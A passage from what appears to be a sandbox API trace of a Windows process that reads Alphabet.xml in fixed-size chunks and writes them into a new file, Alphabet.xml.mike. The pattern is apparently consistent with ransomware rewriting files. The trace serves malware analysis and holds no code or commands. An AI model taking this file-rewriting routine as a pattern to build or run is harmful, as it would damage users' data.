lpBuffer=0x22266b8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22266b8*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.718] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.718] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.718] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.718] GetFileType (hFile=0x264) returned 0x1 [0042.718] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.718] GetFileType (hFile=0x264) returned 0x1 [0042.718] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x41220 [0042.719] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.719] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.719] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.719] GetFileType (hFile=0x264) returned 0x1 [0042.719] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.719] GetFileType (hFile=0x264) returned 0x1 [0042.719] ReadFile (in: hFile=0x264, lpBuffer=0x2233660, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2233660*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.720] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.720] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.720] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.720] GetFileType (hFile=0x264) returned 0x1 [0042.720] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.720] GetFileType (hFile=0x264) returned 0x1 [0042.720] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x43a20 [0042.721] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.721] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.721] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.721] GetFileType (hFile=0x264) returned 0x1 [0042.721] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.721] GetFileType (hFile=0x264) returned 0x1 [0042.721] ReadFile (in: hFile=0x264, lpBuffer=0x2240608, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2240608*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.722] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.722] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.722] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.723] GetFileType (hFile=0x264) returned 0x1 [0042.723] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.723] GetFileType (hFile=0x264) returned 0x1 [0042.723] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x46220 [0042.723] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.723] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.723] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.723] GetFileType (hFile=0x264) returned 0x1 [0042.723] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.723] GetFileType (hFile=0x264) returned 0x1 [0042.723] ReadFile (in: hFile=0x264, lpBuffer=0x224d5b0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x224d5b0*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.724] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.724] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.725] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.725] GetFileType (hFile=0x264) returned 0x1 [0042.725] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.725] GetFileType (hFile=0x264) returned 0x1 [0042.725] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x48a20 [0042.725] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.725] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.725] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.725] GetFileType (hFile=0x264) returned 0x1 [0042.725] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.725] GetFileType (hFile=0x264) returned 0x1 [0042.725] ReadFile (in: hFile=0x264, lpBuffer=0x225a558, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x225a558*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.727] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.727] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.727] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.727] GetFileType (hFile=0x264) returned 0x1 [0042.727] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.727] GetFileType (hFile=0x264) returned 0x1 [0042.727] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x4b220 [0042.728] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.728] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.728] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.728] GetFileType (hFile=0x264) returned 0x1 [0042.728] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.728] GetFileType (hFile=0x264) returned 0x1 [0042.728] ReadFile (in: hFile=0x264, lpBuffer=0x2267500, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2267500*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.729] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.729] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.729] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.729] GetFileType (hFile=0x264) returned 0x1 [0042.729] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.729] GetFileType (hFile=0x264) returned 0x1 [0042.729] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x4da20 [0042.730] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.730] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.730] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.730] GetFileType (hFile=0x264) returned 0x1 [0042.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.730] GetFileType (hFile=0x264) returned 0x1 [0042.730] ReadFile (in: hFile=0x264, lpBuffer=0x22744a8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22744a8*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.763] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.763] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.763] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.763] GetFileType (hFile=0x264) returned 0x1 [0042.763] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.763] GetFileType (hFile=0x264) returned 0x1 [0042.763] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x50220 [0042.764] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.764] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.764] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.764] GetFileType (hFile=0x264) returned 0x1 [0042.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.764] GetFileType (hFile=0x264) returned 0x1 [0042.764] ReadFile (in: hFile=0x264, lpBuffer=0x2281450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2281450*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.765] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.766] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.766] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.766] GetFileType (hFile=0x264) returned 0x1 [0042.766] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.766] GetFileType (hFile=0x264) returned 0x1 [0042.766] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x52a20 [0042.766] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.766] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.766] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.766] GetFileType (hFile=0x264) returned 0x1 [0042.766] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.766] GetFileType (hFile=0x264) returned 0x1 [0042.766] ReadFile (in: hFile=0x264, lpBuffer=0x228e3f8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x228e3f8*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.768] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.768] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.768] GetFileType (hFile=0x264) returned 0x1 [0042.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.768] GetFileType (hFile=0x264) returned 0x1 [0042.768] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x55220 [0042.768] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.768] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.769] GetFileType (hFile=0x264) returned 0x1 [0042.769] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.769] GetFileType (hFile=0x264) returned 0x1 [0042.769] ReadFile (in: hFile=0x264, lpBuffer=0x229b3a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x229b3a0*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.770] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.770] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.770] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.770] GetFileType (hFile=0x264) returned 0x1 [0042.770] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.770] GetFileType (hFile=0x264) returned 0x1 [0042.770] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x57a20 [0042.770] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.771] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.771] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.771] GetFileType (hFile=0x264) returned 0x1 [0042.771] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.771] GetFileType (hFile=0x264) returned 0x1 [0042.771] ReadFile (in: hFile=0x264, lpBuffer=0x22a8348, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22a8348*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.772] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.772] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.772] GetFileType (hFile=0x264) returned 0x1 [0042.772] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.772] GetFileType (hFile=0x264) returned 0x1 [0042.772] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x5a220 [0042.773] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.773] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.773] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.773] GetFileType (hFile=0x264) returned 0x1 [0042.773] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.773] GetFileType (hFile=0x264) returned 0x1 [0042.773] ReadFile (in: hFile=0x264, lpBuffer=0x22b52f0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22b52f0*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.774] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.774] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.774] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.774] GetFileType (hFile=0x264) returned 0x1 [0042.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.774] GetFileType (hFile=0x264) returned 0x1 [0042.774] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x5ca20 [0042.775] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.775] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.775] CreateFileW 